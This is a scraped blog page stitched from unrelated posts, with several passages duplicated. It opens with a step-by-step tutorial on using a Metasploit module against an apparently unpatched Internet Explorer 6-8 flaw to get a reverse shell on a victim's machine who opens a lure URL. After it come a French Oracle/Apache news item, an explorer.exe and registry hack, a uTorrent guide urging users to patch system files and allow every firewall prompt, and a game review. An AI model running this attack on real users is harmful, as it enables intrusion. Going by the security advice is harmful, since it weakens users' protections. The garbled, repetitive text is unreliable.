Type : Tutorial
Level : Medium, Advanced
For more easier tutorial about Proof of Concept this type of attack, you can view the tutorial here.
Maybe for you who have ready my tutorial about Exploiting IE6 using ie aurora, this exploit is slightly the same, but this exploit has bigger spread, because it affects Internet Explorer 6, Internet Explorer 7, and Internet Explorer 8.
When I'm surfing around and looking for articles about Internet Explorer, accidentally I found this 0day(Zero Day) exploit in Internet Explorer. For you who didn't know about what is Zero Day, this is a situation where someone found a hole in an application and the vendor still looking for some way how to close/patch the hole. When I read the facts about this, this hole found in November 2010(It's still fresh), that's why this things called Zero Day.
I won't speak too much, because I will writing some tutorial here. not a story…LoL :p
Requirement :
1. Metasploit Framework
2. ms10_xxx_ie_css_0day.rb
Download Source Code
Step By Step :
1. Copy the ms10_xxx_ie_css_0day.rb to your browser exploit. You can see how to do this by view my tutorial previous tutorial and see option number 1.
2. Run your Metasploit framework
Run Your Metasploit Framework
3. After you do the step 1 above, now you should have ms10_xxx_ie_css_0day exploit in your database and you can use it.
Use The Exploit
4. The next step is set up your PAYLOAD. What you want to do when someone caught by this exploit. windows/shell_reverse_tcp is still my favourite one…LoL :D
Set Exploit PAYLOAD
5. Okay you've done, the next step is you need to define your server to receive connection from the victim. There are 4 things you need to set up before the exploit command.
- set SRVHOST your_IP
- set SRVPORT your_server_PORT(usually more effective in 80)
- set URIPATH your_desired_URL
- set LHOST your_IP
set Exploit and payload options
6. Our server already started, there's an address You can try to open this URL in your internet explorer version 6, 7 or 8, but I'm trying it in my IE6 Windows XP SP3.
Victim open the URL
7. After the user trying to open the URL, our server response that someone already accessed the Exploited URL.
Server response when someone open the exploited URL
8. The sessions already created. to interract with the sessions, run sessions – i 1.
That's it, when I'm writing about this tutorial, there's still no patch available about this.
*ps : click the grey box area of my affiliations box
I really appreciate if you support my idea or buy me a cup of tea when I writing tutorials and free tools by clicking one of my affiliations at the right side. :-)
vendredi 24 décembre 2010
Oracle invite la fondation Apache à reconsidérer son départ du Java Community Process
Oracle invite la fondation Apache à reconsidérer son départ du Java Community Process
La fondation ne répond pas
Mise à jour du 13/12/2010 par Idelways
Oracle a réussi à faire valider les spécification de Java 7 et 8 à une forte majorité (lire ci-avant). Il n'en demeure pas moins que le départ, provoqué par ce vote, de la fondation Apache, une fondation impliquée dans une centaine de projets dans l'écosystème Java, semble sérieusement l'inquiéter.
Après voir demandé à la fondation de reconsidérer son opposition aux propositions formulés pour Java 7 et 8 (lire ci-avant), Oracle vient de tendre la main à la fondation pour amorcer une tentative de réconciliation. Et la prie de revoir sa décision de quitter le comité exécutif de java (JCP)
Dans un court billet de blog, Adam Messinger, vice président du développement à Oracle, rappelle les faits et encourage la fondation Apache à "reprendre part aux efforts destinés à faire avancer la technologie Java".
Car, avoue Messinger, "la fondation Apache et ses nombreux projets open-source sont une partie importante de l'écosystème Java".
Sans en dire d'avantage, il semblerait que le départ de la fondation n'enchante pas Oracle.
De son côté, la fondation Apache fait (officiellement) la sourde oreille. Elle semble en tout cas moins pressée de répondre à ce message que la fois passée.
Jim Jagielski, président de la fondation, depuis son compte Twitter personnel se demandait néanmoins, dubitatif et quelque peu ironique, quelle raison pourrait justifier le retour de la fondation au Java Community Process.
Il allait même plus loin la semaine dernière dans un billet sur son blog personnel où il affirmait que le Java Community Process était tout bonnement mort et que c'était "Oracle qui l'a tué".
Jagielski y appelait également à la constitution d'un nouveau Community Process.
Pas sûr qu'une telle initiative emporte une adhésion massive.
Source : le message d'Oracle, le Twit de Jim Jagielski et son Blog personnel
La fondation ne répond pas
Mise à jour du 13/12/2010 par Idelways
Oracle a réussi à faire valider les spécification de Java 7 et 8 à une forte majorité (lire ci-avant). Il n'en demeure pas moins que le départ, provoqué par ce vote, de la fondation Apache, une fondation impliquée dans une centaine de projets dans l'écosystème Java, semble sérieusement l'inquiéter.
Après voir demandé à la fondation de reconsidérer son opposition aux propositions formulés pour Java 7 et 8 (lire ci-avant), Oracle vient de tendre la main à la fondation pour amorcer une tentative de réconciliation. Et la prie de revoir sa décision de quitter le comité exécutif de java (JCP)
Dans un court billet de blog, Adam Messinger, vice président du développement à Oracle, rappelle les faits et encourage la fondation Apache à "reprendre part aux efforts destinés à faire avancer la technologie Java".
Car, avoue Messinger, "la fondation Apache et ses nombreux projets open-source sont une partie importante de l'écosystème Java".
Sans en dire d'avantage, il semblerait que le départ de la fondation n'enchante pas Oracle.
De son côté, la fondation Apache fait (officiellement) la sourde oreille. Elle semble en tout cas moins pressée de répondre à ce message que la fois passée.
Jim Jagielski, président de la fondation, depuis son compte Twitter personnel se demandait néanmoins, dubitatif et quelque peu ironique, quelle raison pourrait justifier le retour de la fondation au Java Community Process.
Il allait même plus loin la semaine dernière dans un billet sur son blog personnel où il affirmait que le Java Community Process était tout bonnement mort et que c'était "Oracle qui l'a tué".
Jagielski y appelait également à la constitution d'un nouveau Community Process.
Pas sûr qu'une telle initiative emporte une adhésion massive.
Source : le message d'Oracle, le Twit de Jim Jagielski et son Blog personnel
lundi 27 septembre 2010
Metasploit Framework Free courses
This free information security training is brought to you in a community effort to promote awareness and raise funds for underprivileged children in East Africa. Through a heart-warming effort by several security professionals, we are proud to present the most complete and in-depth open course about the Metasploit Framework.
link here
jeudi 23 septembre 2010
Change Text on XP Start Button.
Step 1 – Modify Explorer.exe File
In order to make the changes, the file explorer.exe located at C:\Windows needs to be edited. Since explorer.exe is a binary file it requires a special editor. For purposes of this article I have used Resource Hacker. Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Microsoft Windows 95/98/ME, Windows NT, Windows 2000 and Windows XP operating systems.
get this from:
The category we are going to be using is “String Table”. Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable. We’re going to modify item 578, currently showing the word “start” just as it displays on the current Start button.
There is no magic here. Just double click on the word “start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry. In my case I used Click Me!
You’ll notice that after the new text string has been entered the Compile Script button that was grayed out is now active. I won’t get into what’s involved in compiling a script, but suffice it to say it’s going to make this exercise worthwhile. Click Compile Script and then save the altered file using the Save As command on the File Menu. Do not use the Save command – Make sure to use the Save As command and choose a name for the file. Save the newly named file to C:\Windows.
Step 2 – Modify the Registry
Make a backup of your registry before making changes!
Now that the modified explorer.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open field. Navigate to:
Close Registry Editor and either log off the system and log back in, or reboot the entire system if that’s your preference. If all went as planned you should see your new Start button with the revised text.[/b]
In order to make the changes, the file explorer.exe located at C:\Windows needs to be edited. Since explorer.exe is a binary file it requires a special editor. For purposes of this article I have used Resource Hacker. Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Microsoft Windows 95/98/ME, Windows NT, Windows 2000 and Windows XP operating systems.
get this from:
h**p://delphi.icm.edu.pl/ftp/tools/ResHack.zipThe first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe.
The category we are going to be using is “String Table”. Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable. We’re going to modify item 578, currently showing the word “start” just as it displays on the current Start button.
There is no magic here. Just double click on the word “start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry. In my case I used Click Me!
You’ll notice that after the new text string has been entered the Compile Script button that was grayed out is now active. I won’t get into what’s involved in compiling a script, but suffice it to say it’s going to make this exercise worthwhile. Click Compile Script and then save the altered file using the Save As command on the File Menu. Do not use the Save command – Make sure to use the Save As command and choose a name for the file. Save the newly named file to C:\Windows.
Step 2 – Modify the Registry
Make a backup of your registry before making changes!
Now that the modified explorer.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open field. Navigate to:
HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ WinlogonIn the right pane, double click the “Shell” entry to open the Edit String dialog box. In Value data: line, enter the name that was used to save the modified explorer.exe file. Click OK.
Close Registry Editor and either log off the system and log back in, or reboot the entire system if that’s your preference. If all went as planned you should see your new Start button with the revised text.[/b]
Maximizing BitTorrent Speed With uTorrent
What We Need
- An Internet Connection and its maximum download and upload speed. If you are not sure of your download/upload speeds, visit http://www.speedtest.net/ to run a speed test. Select a download location closest to you, especially if you are outside US. The Recommended Server (golden pyramid) works out most of the time.
Once the test is done, you get the results:
Note down the numbers under Download and Upload including the unit; in this case, Mbps. You will need them later. - Patched TCPIP.sys to allow more concurrent half-open connections. Windows XP SP2 and Vista limits the number of half-open connections to 10. Windows 7 users: This patcher is NOT required for Windows 7 as there is no such limitation in Windows 7.NOTE: This step has been generally found not to make any improvements in Bittorrent speed. In fact, it can even cause problems with certain routers such as auto-restarting and stalling of internet access. Do this only as a last resort. To increase the limit, there are two freely available patchers:
Lvllord Patch – ONLY for Windows XP Users (NOT Vista/Windows 7 users, see next step for Vista users)
UPDATE: There has been a recent Automatic Update (MS08-001) released on January 8 2008 that addresses some network security concerns. The below has NOT been tested with the latest TCPIP.SYS (v5.0.2195.7147) file. Update:The patch has been tested with KB941644 (an automatic update) and works perfectly!
- Go to this site - http://www.lvllord.de/
- Click on Downloads.
- Right-click the link and click “Save Target As“.
- Save it in your Desktop.
- Open the file and run the program located inside the archive, agreeing to the security warning.
- Some text should scroll by in a MS-DOS window, after it ends, type C.
- Enter 100 for the number of concurrent half-open connections and press Enter.
- Type Y and the file should be patched. Cancel any Windows XP warnings that should appear, it is part of Microsoft’s way of ensuring its files are not tampered with (the utility tampers with them on purpose to change the limit).
This patcher works for both 32 and 64 bit Vista and XP versions.
- Go to this site - http://half-open.com/download_en.htm.
- Download the EXE file in the link titled Half-open limit fix 4.1 (as of July 2010)
- Open the folder where you saved the file and run the file you downloaded
- Under ‘New value’, set it to 100
- Click ‘Add to tcpip.sys‘
- Click OK.
- Click OK again. Cancel any Windows warnings that may appear, it is part of Microsoft’s way of ensuring its files are not tampered with (the utility tampers with them on purpose to change the limit).
- Restart your computer.
- If something is not working right (e.g. Internet access does not work anymore) and you want to undo the changes, run the software again and click “Restore original file”.
- A BitTorrent software client – We recommend uTorrent. This guide uses uTorrent for the tutorial.
- And finally, some torrents to kick off a download. A sample torrent file will be provided later.
As of August 2010, the latest Windows version is 2.0.3. For MAC users, some of these tips do not apply to you. Please see the FAQ below.Getting to the file:
- Click on this download page - http://www.utorrent.com/downloads
- Click the big green image that says “Download Now“.
- A dialog box should pop out. Choose to RUN it.
- If any security dialogs appear, click Run as we know this is a safe file.
Configuring uTorrent
The configuration part is where most people mess up. Most of us will just click through the dialogs accepting the default values. This may apply to some of us, but not the majority. The below installation guide uses uTorrent Version 2.0. Older versions may have some steps missing.- Run the program. Ignore the security warning if any appears (Click Run) – we know perfectly well that the file is legitimate.
- You get the welcome screen when it runs:
Click Next. A scam warning will appear as many people have been tricked into paying for utorrent which is supposed to be free in the first place. Anyway, click Next. - New to utorrent version 1.8.3 onwards – a license agreement! This used to be as a link in the Install location.
Read the legal mambo jambo (yea right!). Click I Agree to continue.
Starting a simple torrent
We need to start a simple download, and the one that will be using is a 650MB file of Ubuntu! It is a perfectly legal and free file to download. We will be downloading this file purely for testing and delete it later on (as it is of no use to us)- Minimize uTorrent for now. Notice that it resides on the system tray (bottom right) automatically.
- Click to http://torrent.ubuntu.com:6969/.
- Look at the column labeled “complete”. Find the row with the largest value. A quick way is to scroll down and scan for a 3 digit figure in that column. Or perform a search for the string ‘desktop-i386.iso’.
- Now download the torrent – click the link in the 2nd column of that row
- You should get this dialog:
This is the metadata file, it contains information on the file you want to download eventually. That is why the file size is so small. We want uTorrent to automatically start downloading it, so click Open. NOTE: The “Name and Type” may differ on your system. This is normal, as Ubuntu is frequently updated
NOTE: If the Open button does not appear, save the file in your desktop. Then start utorrent, File > Open torrent and open the torrent you saved. Delete the torrent file in the desktop as uTorrent automatically makes a copy of it. - The file opens with uTorrent which automatically pops up this dialog
All values are automatically filled in for you. Here is also where you select files that you don’t want to download – if the download has many files which in this case is not. Remember where the file is stored as indicated in the textfield under “Save As”, or save it in a different location more convenient for you. All looking good, click OK.
Progress of the Download
Click on the Ubuntu torrent (the only item in the list) to view more information on it. You will see all the values at the bottom suddenly burst with activity!Looks like the torrent has a total of 42 seeds and 4 downloaders. 42 seeds is a lot (but some torrents can have 1000+ seeds, depending on popularity) and it means you should get the full file in no time! A seed is a term used to refer to peers who have downloaded and are sharing the complete file.
However, after running for 5 minutes, the speed refuses to go above 20 KB/s, which is not possible for a highly seeded torrent. Could it be our ISP throttling?
Enabling Protocol Encryption, uTP (UDP Packets) and Increasing Speed Via Max Half Open Connections
uTorrent by default disables protocol encryption. We need to enable this so that the ISP’s packet shaping hardware will detect our BitTorrent traffic as normal traffic and hopefully let it pass.- Click on Options, Preferences.
- Click on BitTorrent in the left column,
- You should get a dialog similar to one below
- The one we are concerned about is Protocol Encryption. Set the Outgoing to Enabled.
- Click on Advanced on the left column.
- If you did NOT patch your TCPIP.sys to allow more concurrent half-open connections above, SKIP this step.
Change “net.max_halfopen” value to 50 by selecting the line, modifying the value at the bottom to 50 and clicking Set. NOTE: It is normal for a asterisk(*) to appear. This is to indicate that the value has been changed from the default value.
- At the same Advanced screen, Change “bt.transp_disposition” value to 255 by selecting the line, modifying the value at the bottom to 255 and clicking Set.
- Click OK. Stop all torrents (red stop button on toolbar on top), wait 10 seconds, and Start the torrent (green play button on toolbar). Now let’s watch the speeds.
Bonus Tip!
This part only applies for public torrents. It is useless for private torrents as they specifically prohibit sharing with other trackers.The tip: Look for more public tracker servers that have the file. However, this tip does not work for torrents that are private i.e. the DHT Status field shows ‘not allowed’ for the torrent.
After getting the same torrent from ISOHunt.com (a site that consolidates multiple trackers into one torrent file)
Needless to say, the speed increased tenfold! Now the question: how do you find more torrents of the same kind? There are several ways, via ISOHunt, Torrentz and… Google! Here’s how to make your search easier.
- Highlight the row of the torrent by clicking on the torrent name
- Click on the General tab at the bottom of the window
- There should be a field labeled Hash near to the bottom with a string of 40 alphanumeric characters. Right-click the value of this field and click Copy.
Finding More Trackers Via ISOHunt.Com
- Go to ISOHunt.com
- Paste the hash into the search box. To paste the value, right-click the search box, and click Paste. Click Search.
- There should only be one result. Click that result and download the torrent.
- You should get the box below. If not, you are downloading a wrong or different torrent. The torrent must be exactly the same except for the tracker servers.
Finding More Trackers Via Torrentz.com
- Go to Torrentz.com
- Paste the hash into the search box. To paste the value, right-click the search box, and click Paste. Click Search.
- You should be automatically be brought to the torrent page, if Torrentz has a record for it.
- Find the keyword ‘You can get a µTorrent compatible list here‘ at that page.
- Click the link it points to. You should get a list of trackers.
- Right-click any of the text. Click ‘Select All‘
- Right-click any of the text again. Click ‘Copy‘
- Go to uTorrent and double-click the row of the torrent that want to add the list to
- In the box that pops out, go to the General tab (if it isn’t already there)
- There should be a text box there labelled Trackers. Place the cursor at the end of this box and hit Enter to add a new line
- Right-click the new line and click ‘Paste‘ to paste the list of new trackers. Don’t worry if there are duplicates.
- Click ‘OK‘
Bonus Tip 2!
Optimize your TCP settings. Speedguide.net provides free utilities to make this step as easy as cake. We also have a mirror of the file for Windows XP and forWindows Vista / Windows 7 users.Optimize TCP settings for Windows XP (NOT Windows Vista / 7)
Steps to optimize your internet connection.
- First, download and extract the files to any folder.
- Double-click on the TCPOptimizer application in the folder to launch it
- At the bottom of the window, click “Optimal Settings”
- At the top of the window, select your connection speed. If you are not sure, run the speed test. Use the value that you get for the Download field (which is in kb/s) and set the slider to it.
- If you are using ADSL, check with your Internet Service Provider whether it is based on PPPoE or PPPoA. You may also be able to obtain the information via your router’s homepage.
- Click ‘Apply Changes’ at the bottom of the window.
- Ensure that ‘Backup’ is checked and click OK at the next confirmation box that appears.
- Once the changes are done, reboot your system
Optimize TCP settings for Windows Vista / Windows 7 (NOT Windows XP)
Steps to optimize your internet connection.
- First, download and extract the files to any folder.
- RIGHT-click on the SG_Vista_TcpIp_patch application and click ‘Run as Administrator‘.
- Click Yes to the warning that appears.
- A window similar to the above should pop up. Type ‘Y’ and press ENTER. Some text should begin to scroll
- When the changes are done, the message “Press any key to continue . . .” will appear. Do so.
- Restart your system
Further Tips You Can Try For Optimum Speed
Tweaks that can improve your speed:- There should be a green tick at the bottom, not a exclamation mark as below.
If uTorrent keeps showing this even after 5 minutes, check the possible causes. - To get more peers, right-click the entry on the list, and click Update Tracker (if disabled, grayed out and throttled – you need to wait for some time). Do this especially if you are on a private tracker before you exit the application, so that your ratio is maintained.
- Check the Availability column for the torrent. If it is less than 1, chances are that the torrent is new and the original uploader is still uploading. However, if it remains at a value less than 1 (eg, 0.98) for more than a day, either the torrent does not have seeds or it is a fake. (Thanks TTbarDJ)
- Try resetting your internet connection by switching off and on the modem and router (if applicable) and then firing up uTorrent again.
- Download the latest network driver, uninstall the current one and install back the latest network driver you downloaded by using Device Manager in Start > Control Panel > System > Hardware > Device Manager. This CAN cause your internet to break if you update with the wrong drivers, so be careful!
- Make sure you did not set a download limit accidentally! Many people unknowingly set the download limit when they actually intended to set the upload limit in the right-click menu of the tray icon. To check, Options > Preferences > Bandwidth > Maximum download rate > Set to “0″ > OK
- The following software are known to cause problems with uTorrent: Nvidia Firewall, BitDefender, Avast!, Spyware Doctor 5, Kerio Personal Firewall, Sunbelt Personal Firewall, Norton GoBack, McAfee Firewall, SpamPal, Norman Personal Firewall, CyberSitter, V-Com System Suite, V-Com Fixit Pro, Norman Personal Firewall, McAfee Firewall, Cybersitter, Norton AntiVirus and McAfee Anti-virus. If you have any of this software, you may want to read this page.
- The following routers are known to cause problems with uTorrent: Linksys WRT54G, Linksys WRT54GL , Linksys WRT54GGS and D-Link DI-514 . If you have any of this routers, you may want to read this page. As of August 2010, the linked page does not show any of the incompatible hardware (it did in the past) and has been removed for some reason.
- Power off your router and modem and power it on back after about 30 seconds. This has made improvements in speed for some people.
- Some people have reported speed increases using an older version of utorrent, specifically utorrent version 1.6. You can download it from our servers at bootstrike.com and try that instead.
- Setting a high upload can sometimes slow down a fast torrent. For example, in our ADSL connection, if we upload at 10KB/s we can get up to 350KB/s. If we upload at 30KB/s, the download speed gets limited to 200KB/s. The total upload available to me is 60KB/s.This is where you have to experiment by setting a low upload rate (from 10 at Options > Preferences > Bandwidth > Maximum upload rate) and watching if the speeds increase for 5 minutes, especially if the torrent is heavily seeded. But remember, you must upload in order for peers to share their downloaded data with you. It is possible to set a very low upload, but the chance of peers sending you their data will decrease, pulling down your download speed.
- Some people have reported speed increases by setting the peer.lazy_bitfield setting to false in Options > Preferences > Advanced.
- Change the Options > Preferences > Bittorrent > Protocol Encryption to Forced. This will force encryption on all outgoing packets and will not fallback to un-encrypted mode if the peer refuses to co-operate. Good for connecting to only encryption-enabled peers. Avoid doing this for torrents with low peers/seeds.
- Remove the check for Options > Preferences > Bittorrent > Protocol Encryption > Allow Incoming Legacy Connections. This will make all your outgoing and incoming packets fully encrypted, except for tracker communications. Peers who are using a torrent software that doesn’t support encryption are dropped. Avoid doing this for torrents with low peers/seeds.
- Private trackers, especially those that specifically tell utorrent to disable DHT (effectively disabling Peer Exchange and Local Peer Discovery too), can affect speeds negatively. You can tell if the torrent is private by selecting the torrent and looking at the DHT value. If it says “disabled”, it is a private torrent.That said, the main reason private trackers exist is because they enforce sharing rules that tries to prevent a person from downloading a torrent and running off without uploading back the same amount of data he downloaded. For new and popular torrents on such trackers, you may be able to get good speeds as everyone will be trying to increase their upload/download ratio. Again, experiment. The key point here is the seeds/leechers ratio and the popularity of them in public and private trackers.
- Increase the number of connections in Options > Preferences > Bandwidth > Number of Connections. Experiment by increasing the number of global/max connections in steps of 25.
- Some people use software such as Peer Guardian or Protowall to ‘protect’ from law spy computers. At last check, Peer Guardian blocks about 773,125,915 out of 4,294,967,296 possible IPv4 addresses. That is about 18% of the whole Internet World Wide Web! Which means lesser peers and that means lower speeds! For the protection it claims to offer, speed is a compromise.
- Windows Vista / Windows 7 users! Disabling TCP/IP Auto Tuning helped improve speeds for some people
- Click Start.
- In the box at the bottom, type CMD and do NOT press Enter. You should see CMD come up on the list as shown below:
- RIGHT-click the icon and click “Run As Administrator“
- A “User Account Control” box should spring up. Click Continue (or ‘Yes’ for Windows 7)
- Type this into the prompt: netsh int tcp set global autotuninglevel=disable
- You should get a “Ok.” response.
- Restart your system.
- If you have a proxy server such as a local ISP’s one, using it has helped many people improve their speeds. Go to Options > Preferences > Connection. Under ‘Proxy Server’, select the Type as HTTP and specify your proxy and port. Check the box ‘Use proxy server for peer-to-peer connections’. Press OK and restart uTorrent.
- UTP has been reported to cause problems. To fully disable UTP, go to Options > Preferences > Advanced and set bt.transp_disposition to 5.Note that the setting overrides the “Enable bandwidth management” setting in Options > Preferences > BitTorrent.
- The automatic TCP rate limiter can also cause problems. To disable this feature, go to Options > Preferences > Advanced and set bt.tcp_rate_control to false.
Having done all the above, if the website still says that it has problems accessing the port, the ultimate test will be when we do a test torrent download. For now, click on Save & Continue. If the button is disabled, reselect the upload speed value and the button should enable again.
You want the program to be easily accessible, don’t you? Click Next > with the default options and uTorrent shortcut s will be created in your desktop, quick launch and start menu, as well as installing it to a permanent location.
Bottom line? If your Internet Access is unlimited, leave the checkbox checked. Otherwise, uncheck the last box.
This is NOT required, 100% optional and will NOT affect your download/upload speeds. Installing this will insert a Ask.Com Toolbar in Internet Explorer and Firefox (if you have it). Then why is uTorrent including Ask.com Toolbar? Because it gets paid for every installation and is a means of some revenue for the company. So it is entirely up to you whether you want it. If you find that you don’t like it later on, you can remove the toolbar from Add/Remove programs later on without affecting uTorrent.
Check your desired boxes and click Install
Click Yes. On current versions of uTorrent, this is done automatically.
Uncheck ‘Bandwidth’ since you already know your Internet connection speed limits from the Speedtest.net tests above. We do not recommend using uTorrent’s bandwidth tests as the servers are not as globalized as Speedtest.net. Now the value that we are interested in right now is the dropdown labelled ‘Your Upload Speed’, which is using the unit of kbit/s (kilobits per second). If you have trouble understanding your speed, consider this: Internet Explorer shows download speed as KBps when you download a file.
There is a big difference between 5Kbps (kilobits) and 5KBps (kilobytes). Make sure you got the right values in kbps (not kBps, the cAsE of ‘b’ matters) . Use Google Calculator if you need help with conversions. .
The authors of uTorrent have been very helpful in providing a list of predefined values. Your connection should be near to one of the above categories. Each value (e.g. “28.8kbit/s (Dial-up)“) means that your download is unlimited and your upload is limited to the number indicated there (e.g. 28.8kbps, which is 3.6KBps by Google Calculator). With your results of the speed test you did above, select the closest upload speed from the list. Select a value lower than your upload speed. For example, if your upload is 31.6 kbit/s, you would select 28.8kbit/s. Once you select a value, uTorrent instantly adjusts the “uTorrent Bandwidth Configuration ” area with recommended values for your upload speed. 1Mbit (1 megabit) is equivalent to 1024kbit (1024 kilobits) by Google Calculator.
We’re not finished yet.
Note: The default download speed in utorrent is Unlimited. Even if your download is limited in some way, it is always better to leave it at unlimited to get maximum download speeds. However, if you need to limit your download speeds, right-click the utorrent icon on the system tray (bottom right), clickDownload Limit and set accordingly. You can also set this in the Preferences dialog.
Note: uTorrent randomly generates a port number in Current Port. This guide assumes the port number to be 55641 – but you can substitute it with the number uTorrent shows.
Click Run Tests.
- Home Router
If you are running a router (sometimes called wireless access point) at home, you will have to configure it to route all TCP / UDP BitTorrent traffic to port55641 to your computer. If so, visit this page for a guide on how to port forward. Click the router you are using and follow instructions. When following the guide and the router asks for a range of ports to forward, simply specify 55641 to 55641 (remember to substitute it with the actual port number you are using). - Personal Firewall
If you are running a firewall software such as Norton Internet Security, Norton 360, Kaspersky, ZoneAlarm, etc, then configure your firewall such that uTorrent has access to port 55641. This is normally accomplished by starting up utorrent. The firewall should spring up an access alert. Simply select the option to “Always Allow” to allow the program to access the Internet. Messages such as “utorrent wants to act as a server” or “utorrent is attempting to listen for connections” must be allowed as well. In fact, if the program in question is utorrent, you should always check “Allow” no matter what request it is. Windows Firewall Users
uTorrent will automatically configure Windows Firewall for you so there is no action needed from you.
This is NOT required, 100% optional and will NOT affect your download/upload speeds. Installing this will insert a Ask.Com Toolbar in Internet Explorer and Firefox (if you have it). Then why is uTorrent including Ask.com Toolbar? Because it gets paid for every installation and is a means of some revenue for the company. So it is entirely up to you whether you want it. If you find that you don’t like it later on, you can remove the toolbar from Add/Remove programs later on without affecting uTorrent.
Check your desired boxes and click Install
Click Yes. On current versions of uTorrent, this is done automatically.
Uncheck ‘Bandwidth’ since you already know your Internet connection speed limits from the Speedtest.net tests above. We do not recommend using uTorrent’s bandwidth tests as the servers are not as globalized as Speedtest.net. Now the value that we are interested in right now is the dropdown labelled ‘Your Upload Speed’, which is using the unit of kbit/s (kilobits per second). If you have trouble understanding your speed, consider this: Internet Explorer shows download speed as KBps when you download a file.
There is a big difference between 5Kbps (kilobits) and 5KBps (kilobytes). Make sure you got the right values in kbps (not kBps, the cAsE of ‘b’ matters) . Use Google Calculator if you need help with conversions. .
The authors of uTorrent have been very helpful in providing a list of predefined values. Your connection should be near to one of the above categories. Each value (e.g. “28.8kbit/s (Dial-up)“) means that your download is unlimited and your upload is limited to the number indicated there (e.g. 28.8kbps, which is 3.6KBps by Google Calculator). With your results of the speed test you did above, select the closest upload speed from the list. Select a value lower than your upload speed. For example, if your upload is 31.6 kbit/s, you would select 28.8kbit/s. Once you select a value, uTorrent instantly adjusts the “uTorrent Bandwidth Configuration ” area with recommended values for your upload speed. 1Mbit (1 megabit) is equivalent to 1024kbit (1024 kilobits) by Google Calculator.
We’re not finished yet.
Note: The default download speed in utorrent is Unlimited. Even if your download is limited in some way, it is always better to leave it at unlimited to get maximum download speeds. However, if you need to limit your download speeds, right-click the utorrent icon on the system tray (bottom right), clickDownload Limit and set accordingly. You can also set this in the Preferences dialog.
Note: uTorrent randomly generates a port number in Current Port. This guide assumes the port number to be 55641 – but you can substitute it with the number uTorrent shows.
Click Run Tests.
- Home Router
If you are running a router (sometimes called wireless access point) at home, you will have to configure it to route all TCP / UDP BitTorrent traffic to port55641 to your computer. If so, visit this page for a guide on how to port forward. Click the router you are using and follow instructions. When following the guide and the router asks for a range of ports to forward, simply specify 55641 to 55641 (remember to substitute it with the actual port number you are using). - Personal Firewall
If you are running a firewall software such as Norton Internet Security, Norton 360, Kaspersky, ZoneAlarm, etc, then configure your firewall such that uTorrent has access to port 55641. This is normally accomplished by starting up utorrent. The firewall should spring up an access alert. Simply select the option to “Always Allow” to allow the program to access the Internet. Messages such as “utorrent wants to act as a server” or “utorrent is attempting to listen for connections” must be allowed as well. In fact, if the program in question is utorrent, you should always check “Allow” no matter what request it is. Windows Firewall Users
uTorrent will automatically configure Windows Firewall for you so there is no action needed from you. - Corporate Firewall
Are you running this software in a corporate network? Bad news – you have to inform the admin that you want the port to be forwarded to your computer. The good news – you can still go by without port forwarding, but speeds will not be optimal
Are you running this software in a corporate network? Bad news – you have to inform the admin that you want the port to be forwarded to your computer. The good news – you can still go by without port forwarding, but speeds will not be optimal
All are fine except for the last one – ‘Start utorrent when Windows starts up’. This used to be optional but with version 1.8.3 onwards, utorrent is set by default to start along when Windows starts. This may irk some users, especially if you pay for Internet Access by the megabyte. How? If you close uTorrent after you are done with it without deleting the torrent and restart your computer, utorrent starts in the background and continues seeding the torrents.
Bottom line? If your Internet Access is unlimited, leave the checkbox checked. Otherwise, uncheck the last box.
Transformers : War For Cybertron-A Review

War For Cybertron (WFC) has bucket loads of substance. The game is overflowing with so much substance, die hard Transformers fans are left foaming at the mouth, desperate for more. As soon as you fire up WFC it’s clear that you aren’t playing your regular run of the mill Transformers. Instead, you’re immersed in a dark, gritty and downright hellacious world that feels as foreboding as it does foreign. Gone are the lush environments of Earth and present are the sharp and brutal contours of Cybertron; a mechanical planet that forgot to put out the welcome mat.
WFC is a third-person action blockbuster that runs at an incredible pace. I’ll warn you right now, if you intend to play this game on hard you better strap yourself in because WFC takes no prisoners. The game is broken up into playable chapters, like Gears of War, and these chapters are split between Autobot and Decepticon campaigns. Depending on the chapter, you’ll get to choose between multiple characters, all of which are quite recognisable if you call yourself a Transformers fan (even if you just watch the movies). There are chapters that require you to go in blazing in robot form, while other chapters allow you to cruise through the circular pipe-like streets of Cybertron in vehicle form. However, the best chapters are those that require flight. WFC is at its best when there’s an all out dogfight in the sky.
The gameplay mechanics that govern battles are not meant to make you feel comfortable. If you’re already used to snapping behind cover by pressing a button, like Uncharted, you might find the fights a little frustrating because there’s none of that in WFC. Other reviewers have criticised this, but really, what did they expect? Transformers are big clunky robots and it would look ridiculous if they were given the ability to instantly snap into cover with the finesse of Nathan Drake. The lack of cover makes it hard to avoid enemy fire, because even if you think you’ve got your bag of bolts hidden safely behind that wall, chances are you’ve still got a piece hanging out that you can’t see. And that piece is enough to see you blasted into oblivion before you can shout “Rollout”.
Instead of ducking behind cover and biding your time, you’ll find yourself changing from robot form to vehicle form multiple times throughout a battle, to either escape enemy fire or to find more ammo. This type of combat strategy will probably not go down well with the kind of player who prefers to use the stealth tactics they’ve learned from games like Metal Gear Solid. The change of pace starts off as unrelentingly painful and you’ll probably die a million times before you get the hang of it, but once you do, life is sweet from there on in.
